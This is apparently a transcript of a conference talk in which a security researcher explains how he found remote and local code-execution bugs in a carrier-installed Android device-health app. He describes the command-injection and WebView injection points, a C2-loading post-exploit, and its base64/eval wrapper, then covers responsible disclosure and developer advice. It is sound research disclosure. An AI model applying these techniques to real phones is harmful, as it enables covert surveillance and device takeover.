So our next speaker is Jonathan Bar-Orr on how getting a free phone got me to report critical vulnerabilities affecting millions of Android devices. I am so glad you did that. Thank you. Jonathan Bar-Orr, or J-B-O, is the Microsoft Defender Research Architect for cross-platform... blah, blah, blah. I rented these lips this morning. They're not working. Research Architect for cross-platform, focusing on macOS, Linux, Android, and iOS research. Jonathan has rich offensive security research on various platforms and architectures, as well as a combination of defensive skills and threat research. So without any further ado, Jonathan, take it over. You need to pick up a microphone in order to... Yeah, I know. Hold on. Turn it on. Hold on. Do I pick that with R or L? Leave it to R. Just the left click. Jesus. All right. Can anyone hear me at all? I can. Yes, we hear you just fine. So I do have the mic right now? I think so. All right. Awesome. Let me check real quick. Doesn't look like I have the mic, but let me... Okay. I turned megaphone on for you, so it should work. All right. Awesome. Thank you so much. So let's go on the next slide, please. Who am I? My name is Jonathan Boror, or JBO for short. That's my Twitter handle if you ever want to contact. As I was introduced, I'm the Microsoft Defender for Cross-Platform Research Architect. That's basically a very long name, but it basically means that I look at everything that does not run Windows, and that's my responsibility. I do Windows once in a while, though, especially when it comes to, you know, the things that intertwine between Windows and other operating systems like WSL and WSA. And I released some cool blog posts this year on all of these platforms. The Chrome OS one will be released soon. Next slide, please. Well, how did this get started? I relocated to the US back in 2017, and I'm an Android user, so I relocated with the same old Android phone that I had back home. And my carrier, who shall not be named, decommissioned 3G and transitioned into 5G, right, with all the cool stuff that it brings. And because my phone didn't support 5G, it basically became useless. So they decided to send me a free phone as compensation. And, you know, my brain started pounding, and I'm like, should I really trust them? And I decided not to trust their phone blindly and actually see what's inside and buy myself a new phone and play with the old one. Next slide, please. So when exploring a brand new phone, you can do a bunch of stuff. But first thing first, you know, the easiest things, I decided to look at apps. And I discovered that there are tons of system apps there. And one of them seemed to be bundled with something called DTE Ignite, which is an advertisement framework that might install new apps on your phone silently based on your browsing habits. It sounds terrible, but I'm actually not here to talk about that. I'm here to talk about something else that I discovered. So I discovered tons of stuff, but one thing in particular caught my eye. And that was something called a device health app. And it's a system app and had tons of permissions. And that's our focus for today. Next slide, please. Just some background, if you're really unfamiliar with Android. Android apps are conceptually archives. They're not really archives, but you can think of them as archives. And they contain various files. And those files are resources, code, metadata, digital signatures. They're all separated by design and are basically different files. And one of the most important sections there is called a manifest, which contains metadata about the app, the app name, version, activities in it, as well as permissions. And the first thing in any Android app analysis is to examine the permissions that it has. It's saved under androidmanifest.xml as a binary data, but any basic Android analysis tool translates that XML to a human-readable text. So just some background. Next slide, please. And this is a list. I don't know how much you can see with the OutSpace VR thingy, but this is a pretty big list of what the app is capable of doing. And basically, it can access the internet, access Wi-Fi state, read phone state, read external storage, get package size, use the camera, use the fingerprints, record audio, read phone numbers. And it can do a bunch of stuff that is really overwhelming what it can do. And the list goes on and on. This is just a partial screenshot. So when you look at the activities, they're also in the manifest.xml file, the thing that shows the metadata of the package. You can see that there is the main activity called com.mceMainActivity. And then there are a bunch of other stuff there, like the actions and so on. And the thing that caught my eye is the last two readable lines, the one that says browsable, and then it has the Android scheme mceDigital. So this is basically like the main activity, and it's browsable. Next slide, please. So browsable activities, the app registers a new schema called mceDigital, right? And basically, when the schema is browsed to, this is an Android feature, right? The main activity starts. And this is, for example, how when you open like a Zoom link, you know, Android knows to start Zoom with the right parameters. It's basically a way for an app to say, hey, I want to register that schema. And whenever that schema is accessed, please, please wake me up. And this is the first obvious foothold for a logical remote code execution. Mentally, that's how I imagine it in my mind. And sometimes an attacker can pass malicious data with a schema that will be parsed by the activity, like a buggy schema, URL, get parameters, info. And the next analysis goal for me is, well, what does the app do once it launches through the schema? And can I give it any meaningful input, right, from the URL that's being accessed? Next slide, please. Something about web views, if you've completely been living under a rock in the Android world. In Android, web views are basically components that can parse and present web content, including JavaScript capabilities. So they're like almost mini browsers, if you will. They're useful for app developers, especially for engines that use them extensively cross-platform, right? So if you want to write an app and make it available in Android and iOS, you can use that. And web view is a component. Well, React will do that. But web view is a component that will be used extensively, actually, to run that app. And a lot of apps rely on web views. That's not very, very new. And, you know, a security question is that granting web view capabilities to do certain things, because a lot of apps are, you know, relying on web views, granting the web view capabilities to do certain things is quite problematic. Think of unlimited file access from something that behaves like a browser, right? And plausible scenarios that attacker could actually inject malicious coding to the web view. And the question is, how does Android solve this problem? Next slide, please. And this is achieved by something called an Android base bridge. An app, it's a web view, and it can declare a JavaScript interface and attach it to the web view. And from that point on, the web view can actually invoke methods in the app by that interface and get responses back. The data that can be sent is limited to primitive data types in the Java virtual machine. And this is what's called an Android.js bridge. Next slide, please. This is a toy example of Android.js bridge. In the first part, you can see Java code that will run in the Java app on the Android device. You can see that I declare a class called JS interface. I have to declare something called JavaScript interface. That's an annotation to a method. And then the method actually just adds two numbers. So nothing scary here. And you can see that I had to do two other things. Given a web view, I had to basically enable JavaScript. Then I basically add JavaScript interface with that sense of that class that I just said. And expose it under name. In this case, I expose it under some name. And then the web view can run JavaScript. That's the lower part of the page here. And it will basically invoke window.someName.addNumbers. Just invoke it like that. And the parameters and everything will be sent from the web view to the Android app. And then basically invoked. And I can also get the result. So this is how you add two numbers with an Android.js bridge. Next slide, please. So, only methods. This is something, just a little more background on Android.js bridges. Only methods that are annotated with a JavaScript interface annotation. You've seen that one slide, two slides ago. Can be invoked starting API level four, which is ages ago. Otherwise, you get this funny vulnerability where you say, where the web view can do windows.withName.getClassForName, whatever. You can basically get the runtime.exec method. This happened in 2004 or something. So very, very old. And you can't do that anymore after Android API level four. And therefore, what I'm trying to say is that an analysis of a JS interface should examine the methods that are annotated with a JavaScript interface. So this is kind of like a background on why I'm doing what I'm doing. Next slide, please. If we're going back to my app analysis, we have the health app, right? And the health app basically is browsable. And one thing that I discovered is that it also has a web view called JarvisWebView. That's how they expose it to the... Actually, not expose it. This is how they declare it in the classes there. And the web view has an attached JavaScript interface called JarvisJSInterface. That's just the name that they expose. And the interfaces can be accessed from within the web page via the JavaScript bridges and invoke accessible methods. And one remark is that they're notorious for trust issues, right? In many cases, the app can blindly trust the web view's input, right? And next slide, please. This is kind of like a code blurb of the annotated methods that I found. Three out of four of the annotated methods. And I'll explain why I added the third one as well. The first one is called init. It gets a string. And it basically saves something that I, you know, while reverting, just called a callback name. The second one is called request. It gets a string. And it calls super.request with that string. The third one is called sendResponse. And it's not annotated, so you can't really access it from the web view. And the fourth one is called window.close, which is not very interesting. And I'm just not going to talk about that at all. Slide, please. From a software design perspective, the JarvisJS interface that we saw in the app, it works as an asynchronous server to the JavaScript client. It gets requests in the three methods that I've just shown you. And returns callbacks by injecting JavaScript back to the web view. This kind of explains the stuff that we saw earlier. Init basically gets a string and saves it. That string is going to be used later as a callback function, JavaScript function, to the client. CloseWindow is not very interesting. And request serves requests from the JavaScript client. And this also explains the response methods that we saw earlier. The response methods... Would you actually mind going back one slide? Is that possible? Awesome, thank you. The sendResponse method that we saw is going to be invoked later by the app when it's ready to send a response. And if you can see the code there, I know it's a bit difficult. But basically, it's going to build a URL that starts with JavaScript colon and add some JavaScript code there. That also includes the callback name, by the way. And basically, inject it with loadUrl. That's the last line in the third method here. Next slide, and then next slide again. The request method is... Well, the request method actually invokes the superclass.request. And the superclass for that JavaJS interface is just called serviceTransport. And after some unimportant tasks, I examined what it does. And it will treat the input string as a JSON object. And it extracts some members from it. Those are the four members. First of all, there is context, which I think of as a request ID. Basically, in an asynchronous model, when you have a client in a server, the client needs to supply, or in some way, there needs to be tracing of some request ID. So that's the context, basically. Service is a service name. More on that later. Command is an integer. Effectively, it's a command number. And data is effectively the arguments that are sent with that command. Next slide, please. And, you know, when you start to take a look at the services that are implemented, again, let me remind everyone, if I have malicious code that runs in the web view, I can basically invoke the JavaJS interface methods. One of them is called request. And with request, I can actually invoke services. And what does that mean? So I started reverse engineering that thing. And there are many services that get registered in a global table. I won't bore you with the gory details too much. But basically, there is a global table that is saved. And each service declares its exposed methods, maps them to command members, along with the argument names and types it expects. And the entire request is being translated on the flight with JavaScript reflection. And each request can also invoke the send response methods that we saw earlier to actually return a response to the client. Next slide, please. Some of the invocable services that I saw, this is a very partial list of interesting services that are accessible from the web view. One of them is audio. You can control audio on the phone, including peripheral volumes and stuff like that. Camera, you can take silent camera pictures. Connectivity, you can basically control Wi-Fi, Bluetooth, NFC, and whatnot. Device controls many aspects of the device. I also found the command injection there, more on that later. Location, you can access GPS and whatnot. Package manager, you can control packages, you can install new apps, which, by the way, because you're a system app, you can do that silently. So, not great. So, basically, my understanding is that Hiku controls the JavaScript, controls the device. If you're able to get malicious JavaScript code, the web view, you basically win. Because it can do a lot of those stuff and many, many more. Next slide, please. This is an example of the camera service. This is actually how the code looks like. After some predefining by me. You have basically... all services must implement something called set service methods map. That's what I referred to earlier as kind of registering their own methods. And you can see that there are two methods exposed here. One of them is get camera list. And the other one is capture still image no preview. And get camera list basically gets no arguments. And capture still image no preview gets one argument, which is called camera ID. And it's a string. And there is another class called IPC, which maps the method names to the actual numbers. So, method number zero is get camera list. Method number one is capture still image no preview. That's just an example of how a service looks like. And then the service can implement those methods however it sees fit. Next slide, please. Well, one of the services in device specifically gets... this is just a command injection that I found. I mentioned that two slides ago. One of the services that gets an activity name and tries to stop it by running the following command. am force-stop, open quotes, activity name, close quotes. And guess what happens when the activity name has quotation marks. So, surprise, surprise, if the activity name has quotation marks, you can basically run arbitrary commands, right? So, this is kind of a command injection. Just in case I wanted to take control of the device even further, this would basically allow me to... if I'm able to run malicious code in the web view, to inject arbitrary code to run as the device health app, which is a system app again. So, this is just one thing, one minor thing that I found. Slide, please. At this point, I was pretty convinced that, you know, this is big. And I assume that a JavaScript injection is possible somehow to the web view. And if we assume that, we can control the phone with all the services. And we can abuse the command injection or simply do other fun stuff, like taking camera snapshots, turning on the microphone, you know, all the fun stuff that you see in the movies. So, you know, you have to do this kind of mental exercise. And, you know, I was like, this is too good not to inject into. There must be a way. So, even before I was convinced I'm going to inject into the web view, I basically implemented my own exploit, which is kind of like a post-exploit, if you think about it, because you still have to inject into the web view. And this is what I did. Next slide, please. This is kind of like a post-exploit code. You basically implement just the thing that the web view is supposed to implement, right? So, basically, create some map. I created a C2 just for us to have fun. And you can invoke that with Ajax. And you can set the callback. If you can see in the last part, it says window.response callback equals whatever. And then you can actually call the bridge and initiate that with whatnot. Next slide, please. And this is kind of like a generic code for the send request part. This actually sends a request to the web view, to the JS bridge, sorry. And this makes everything very simple. Because now, if you look at the right part, you will see that it says, basically, this is how you run stuff from the web view, if you could inject into it. You basically do exploit equals new exploit. And then exploit.getCameraList, exploit.storage, do whatever, and so on. So, you can just invoke those methods freely. As I said, you can basically control the phone. So, I prepared that. And, you know, I basically patched the app just to see that it works and it works well. Next slide, please. Kind of like a mid-talk summary, because we've been through a lot. Have a system app. That system app is pre-installed on the phone. And it has a remotely invocable main activity through a browsable activity, right? If you... the MC digital thing. The activity loads a web view, right? That if... and I put a strong emphasis on if. If injected into can essentially take over the phone. And we can build an exploit code that does just that. But can we really inject into web view? That's the question that I had in mind. And that's the 1 million vulnerable Android apps... devices question. Next slide, please. Well, the first attempt to inject was that... I discovered that the page that is being loaded to the web view is loaded... is actually embedded in the app itself as an asset. So a web view can, you know, just like a normal browser, can just load stuff from HTTP. Or it can load stuff from like file, comma, slash, slash, right? Like an asset. And this is what happens in this case. And the JavaScript code that runs on the web is quite obfuscated and was extremely long. Like 100k lines long. And, you know, at this point, by the way, I did forget to mention, like, it became too big for me. And I'm like, okay, let's involve our Android team, because why not? And I basically involved our Android V team in Defender. And we reversed engineered parts of it. But we couldn't find meaningful ways to affect the behavior from the browsable intent. So that was kind of a bummer. And the second hope that I had was to basically have, like, kind of like a person in the middle story. If the app is opened and the web view opens a plain text page, I can basically inject as just because I'm like a person in the middle between the phone and the internet. And we did find several scenarios when that happens. And this is kind of like a success, right? Because basically what you have to do right now is, in my opinion, you know, it's not trivial, but it's not impossible. Next slide, please. So the scenario for remote code execution in this case. Be a person in the middle, right? You can achieve that in numerous ways. Like I can open, you know, a Starbucks Wi-Fi on my phone or something. I can, you know, control your router or do other stuff. Send a link to the target or inject it into a normal plain text web view that the target just browses into. And trigger the browsable activity, the MC digital thing. Because the MC digital browser activity actually kicks in and it's registered by that device health app, which is a system app that was, by the way, hidden from the UI. The app kicks in. The app loads the web view, which runs complicated logic and ends up viewing more contents in plain text, right? Load stuff from external HTTP over plain text. And then I inject malicious JavaScript code into the plain text code. And, you know, I run my exploit and I basically take over the phone. So that's pretty good. Next slide, please. It sounds like our kind of fun RCE on Android is over. But, you know, one thing that got me a bit worried or a bit, you know, intrigued was the fact that during the reverse engineering, we saw that, like, you know, I got my phone from my carrier. In all of the class names and whatnot, when reverse engineering that app, we didn't see that, like, carrier name at all. And we suspected that there is an entire framework, which was not carrier specific, right? You did see that MCA digital thing and so on. And basically tried to assess, you know, we already had an RCE and I was going to basically disclose it responsibly. But when assessing the number of affected devices, we decided to hunt for similar apps that might be using the same framework. And, you know, there is no shame to say we actually just used VirusTotal. And surprisingly, we discovered numerous telcos that use the same framework, right? So imagine all the big telcos. I will not mention anyone because I don't want to be sued. But imagine, you know, all the big telcos in America and whatnot. I mean, this was embedded in five of them and big ones. There seemed to be some customization per telco. So one telco might have certain features and a different telco might have other features. Obviously, besides the app name and logos that are used and stuff like that. And not all apps were susceptible to like the person in the middle attack, right? Some of them actually did not load external code from plain text. So the remote code execution part didn't work. And one thing that I also discovered is that besides those five telcos, there are certain apps that use that framework that might be installed by phone repair shops or for trading purposes. So if it wasn't clear, the device health app is supposed to basically make sure that the camera is working, that the microphone is working. This is why it needed all of those permissions. And basically, some of those telcos pre-installed it in the firmware, right? That's what I've got initially. But we also discovered that there is a specific app that can be installed by repair shops. And sometimes they forget to uninstall the app after you get your phone back from fixed and whatnot. So this is another issue that we saw. Users are always, in this case, either because the app is baked into the firmware or because you got your phone fixed and someone installed an app unbeknownst to you. And users were always, to the best of my knowledge, unsuspecting that this thing even existed. Next slide, please. So we decided to dig deeper and see if we could exploit the apps that were not susceptible to the person-in-the-middle JavaScript injection. And eventually, we found a local JavaScript injection. And this is like... I won't actually wait for responses. But the question is, can you spot the injection opportunity with the next slide? So this is kind of like... Well, this code is taken from multiple methods. But basically, the injection part actually resides in the last part, in the third part. But basically, what's going to happen here is that you get some parameter called flow input that I will mention what it does briefly in a sec. But basically, this flow input is going to be sent to the WebView's init function. The init function is going to basically see if it's empty. And if it's not empty, it's going to save it in other member name. And later, that member name, if it's not empty, is going to be basically loaded into the WebView with load URL again, just like the JavaScript injection that we saw earlier. Next slide, please. This is kind of like what I mentioned. There is a member called mflow SDK input. By the way, I have no idea what it's supposed to do. I never saw it actually being used. But the member exists. And the member is a JSON object stringified and perfectly injected into the WebView, as we saw. The interesting part, and this is where the injection kicks in, there is no string sanitization on the string itself, which means that we could inject it to control that member, right? If I can control that member, I can actually inject JavaScript into the WebView locally. And the member is initialized very indirectly, like there are four or five different classes there, by the intent that creates the app. Interestingly, from a Google Firebase parcel, it doesn't really matter that much, but just because it's funny to me. Next slide, please. I did have one pesky limitation. That the entire payload, because we're talking about the JSON object, and it's going to be, you know, eventually turned into a string, and then injected into the WebView with a JavaScript injection, the entire payload can contain new lines, because JSON stuff, but you can easily overcome that with eval, a2b, and then base64 encoded payload. So, if you have a payload, you can just turn it into base64, and then add some code to, you know, unwrap and undo what you wanted, like the entire base64 thingy. And basically, this is kind of like how you run JavaScript code in one line, right? Which is not a big thing, but still. Next slide, please. Oh, this has a nice PowerPoint animation. Kudos to me. In the left side, you can see the app itself. In the middle part, you can see the WebView. And in the right part, there is an attacker, right? And basically, what's going to happen, and can you click one time, please? You basically, I prepared like the second stage JS loader. That's the first, like, part where, you know, the entire payload where I assumed that I could inject. So, I have that code. And then, next, click, please. I wrap it with eval a2b and base64, but just to make it a one-liner. Next, please. I wrap it into some member that is called dynamic. This is how Google Firebase works in this case. Next one, please. I wrap it into something called a parcel. How objects are basically being serialized in Android. Next, please. This thing is turned into bytes, because this is how you, like, intents can just contain bytes. Next one, please. Then, I wrap it into an intent. An intent, basically, I didn't mention it, but that's the way that you, that's a very popular IPC in Android. And basically, it's the thing that fires apps and activities and whatnot. Next, click, please. So, the intent gets into the app. Next, click. And then, the app unwraps it, takes the bytes, unwraps it, takes the parcel, unwraps it, and so on. It does all of those things. And eventually, it will basically run the second stage JS loader. It will load the JavaScript into the web view. Next one, please. The web view loads the JavaScript. The web view actually loads additional JavaScript from my C2. Next one, please. It invokes client requests, right? And next one, please. It provides responses. Also, by the way, if you want to take pictures of, you know, cameras or turn on the microphone and whatnot, this all works well. And I mentioned here local injection, because if it wasn't clear, to fire that intent with the very specific bytes inside, you have to run and get the app inside to the system app that, you know, the device health app. But this is still considered an elevation of privilege for obvious reasons. Like, your initial app doesn't have to have any permissions. If you can inject and do all of those things, you can basically take over the phone. Next slide, please. This is my exploit code. I won't dive too much into it, but you can see in the first part that I basically take the JavaScript payload. I basically add some code to embed that payload into the web view itself by just inserting a new script element and loading the source from my C2. And basically, I had to append an extra quote, and then I just put A's there for fun. And the idea behind that is that, you know, this is how the JavaScript injection works, right? Like, it takes my input and treats it as a string with quotation marks. So, if I finish a quotation, I can actually inject more JavaScript stuff there. And then basically, the second part was to encode everything into a single statement that's just, you know, basic C4 encoding. Next slide, please. And this basically is kind of... Oh, and in the previous slide... Sorry, can you go one slide back? I apologize. The thing that has the red rectangle is basically where the other injection kicks in. You basically have to put, like, a single quote, right? This is where the JavaScript injection actually kicks in. Flow input member that we discussed. Sorry, now next slide. This basically continues building the entire thing. I build something called a dynamic link data. And basically, in that dynamic link data, the only thing that actually was meaningful is building it eventually as a parcel. And then the parcel, I have to embed into... Like, I have to marshal it. It turns into bytes. And then those bytes are basically embedded in the app itself. In the intent itself. I apologize. As the com.google.firebase.dynamic.links.dynamic.link.data. That's the last part of this right here. Next slide, please. This is a recording of the local injection. I hope it plays well. Can you please try to play it? See how that works. Hey, okay. So, on the left side, you can see the two... We actually had two servers for C2 for other reasons. And then on the right side, you can see the checkup app. And this is our PC app that injects into the system app. The system app, by the way, doesn't have to be turned on. I just turned it off. That's fine. It doesn't really matter. Because we can always start an intent. This will basically start an intent. And on the left side, you can see that it actually starts getting data, right? So, this is basically how our exploit works. This is our recording. Next slide, please. Okay. Responsible disclosure. We disclosed everything to the company that maintains the framework itself, like the entire SDK, as well as all the telcos that were involved. There are five in total. I can't give an exact number. But we're talking about millions of Android devices with vulnerable system apps affected by bugs ranging from full RCE to local EOP. And it took a lot of months, actually. This is quite problematic. You can't really even remove system apps from your Android phone. At least my grandma kind of users can't do that. And we basically released details in coordination with everyone involved to make sure that no end user is put in danger. Because releasing new firmware and basically making sure that everyone updates and so on is very painful to those telcos. And we also constantly work together with Google to actually improve Google Play Protect and spot similar bugs automatically. This is kind of interesting. Those apps, those device health apps or that SDK, actually, was in Google Play. And it still is, by the way, in the Google Play Store. And Google Play has basically something called Google Play Protect, which scans your apps against evil and also vulnerabilities. But they simply didn't have good handling of that vulnerability class, like vulnerabilities that involve JS interfaces. So we are working with Google on that. Next slide, please. Resolution. So disclosure happened around September 2021, but it took more than six months until user risk became sufficiently low for public disclosure. And this is just my take on the thing. One of the main problems is that those were system apps, right? I don't want to use the term bloatware, but I already used it. So let's call it bloatware. System apps are baked into the device firmware image. You can't turn them off. And there are many unsuspecting users. Like, I bet if some of you are Android users, I'm willing to bet that you don't know at least 30% of the system apps that are installed on your phone at any given time. And basically, me working as Microsoft for Defender, we also have Microsoft Defender on Android, and we support something called vulnerability management, which does indicate the existence of vulnerable apps. So if you have a vulnerable app on your phone, and specifically that set of vulnerabilities, we'd be able to at least tell you. So, you know, you can't uninstall the system app, but that's a good start, I think. Next slide, please. A quick note for Android developers. Overpowered web views with JS interfaces are the source of many interesting security bugs. And apps, as I mentioned before, sometimes just blindly trust input from the web views, right? You have a web view and you have your app, and the app simply trusts it without thinking whether it could be injected into or not. And that's one thing. So whenever you develop an app, you know, be mindful of those things. If you implement an asynchronous client-server module by JavaScript injection, then please don't do that. It's really bad practice, and there are good APIs that are included in AndroidX Web Message Listener specifically. Google pointed that out, and we actually look at that code. And the entire serialization is, in my opinion, pretty flawless there, unlike injecting JavaScript and not sanitizing your strings. So use your own API and don't develop something from scratch. And again, and this is like a recurring theme in cybersecurity, if you're forced to inject JavaScript, sanitize your inputs. That should be obvious. Next slide, please. These are kind of conclusions. System apps, in my opinion, do not get enough attention from the security industry. They're especially bad because they can't be easily removed. End users never suspect they have all these apps to begin with. Bloatware, that's what some of us call them. I did mention other suspicious-looking bloatware that were also installed on that phone. But no, I didn't pay too much attention to them. I just really need to find the time, to be honest. But I bet there are other things in that phone as well. And there are special thanks here to the Android V team that worked with me, which is Shengxin Zhang, Michael Peck, Joe Mancer, and Apoorva Kumar, and the entire Microsoft 365 Defender research team. And with that, I'm done. If you have any questions, please do ask them now, or you can just reach out over Twitter or something. My DMs are open. Thank you so much for attending. I have a question. Yes. So, like, this is like, the device, the device, I think, is it like one of those system apps that come with Android, or is it one of those carrier system apps, like the synonym for running apps that you get when you get from that specific carrier? So, it's actually, well, it's not done by Google or by... Yeah, it's more of the latter than the former. Although you could actually, as I said, you can actually install that from Google Play, or if you ever get your phone fixed or traded in or something, it might be installed there already. So, it can be either someone installing that, or it could be baked into your firmware just by the carrier itself. I hope that answers the question. Okay, yes. What's the carrier thing? Yeah, that's why I mentioned those telcos. It's done, well, not by the telcos. They're actually just using that other company that developed the SDK with customization. But basically, the telcos are kind of responsible for that in this case. Okay. Some... Go ahead. I'm just trying to think about those kinds of exploits between those that... You know how you need root to have to remove the system apps and stuff? I was thinking, how actually... I mean, if you run as root, yes, you can uninstall those system apps. I mean, is it just... Does the exploit doesn't really have any practical use for other things? Other things, you know, or just, you know, thread actor stuff? I mean, generally, those kind of exploits could mostly be used, in my opinion, for bad stuff. Could be like an NSO kind of level exploit where someone remotely can just hack your phone. Also, because it's a system app, in most cases, it can actually install apps silently, which a normal app, if you try to install an app, it would actually pop up and at least ask the user for permission. But as far as I remember, not for system apps. And I mean, it's hard for me to say. Exploits are usually used for, you know, either bad guys or for educational purposes. In this case, we actually... Yeah, go ahead. Yeah, because I know like, yeah, you know, because not those exploits are used for an exploit chain. Oh, oh, you mean, yeah, you mean like for jailbreaking and stuff like that? Yeah, that's what I'm saying. The difference between, you know, the exploits, is it more of an exploit can also be used for that? Or is it mostly just for the really, really bad stuff? Well, to be honest, I think mostly not for that. I mean, for jailbreak, you'll have to run as root normally, or flash a new bootloader or whatnot. This is not this kind of exploit. This exploit, I mean, it is beneficial in some cases to run as a system app, but it's not running as root. Oh, okay. Yeah, so it's not really useful for that kind of stuff. More so just... Oh, it's mostly for bad guys. Yeah, that's what I was asking. Thank you. Any more questions? I wanted to ask, like, oftentimes I've heard horror stories of people revealing vulnerabilities with big companies and getting some negative responses. Did you get any kind of negative response from big telco companies when you kind of revealed to them that there's this kind of vulnerability on their product? Good question. This is kind of like a political question, so it's hard for me to answer, but I would say that the responses were mixed. I think that the telco industry is not as mature as other companies, and they might not see you exploiting their stuff with a... They don't see it as a nice gesture, even though we really worked hard to do responsible disclosure. We also... I didn't mention that, but after that company, the company that develops everything, patched everything, we actually tested to make sure that they did everything properly. We did code reviews and whatnot. So it's not just about the exploitation. It's also about how to get that fixed, and they were pretty collaborative, to be honest. The telcos, it's mixed. Some of them were really open and really receptive to basically that kind of disclosure. Others were not as much and had to be convinced. In this case, I would say I'm lucky that I'm running... I'm basically part of a big company that can... Someone important from my company can talk to someone important from that telco. But if you're an individual researcher, I don't know. I think it would have been much more difficult. I would probably say that. Large men in fancy suits would come for your house. Yeah, yeah. Hopefully not. Hopefully not. Yeah. I have a guard cat in my home, so... Awesome. Yes, perfect. Yes, perfect. Make sure you protect both the front and back door. Yeah, yeah. Well, I need another cat. More questions. Awesome. Well, if there are any follow-up questions or you want to get more technical data or whatnot, just reach out to me. I do also macOS, Linux, Chrome OS, iOS, those sort of things. And I'm interested in everything that runs code. So thank you so much. And I'll see you guys around. Thank you, Jonathan. Give our speaker a warm round of applause. We've got roughly 10 minutes to our next speaker. So good time to take a bio break. And choose with the people that are here and network. And then look around for Easter eggs. And we'll see you back in about 10 minutes.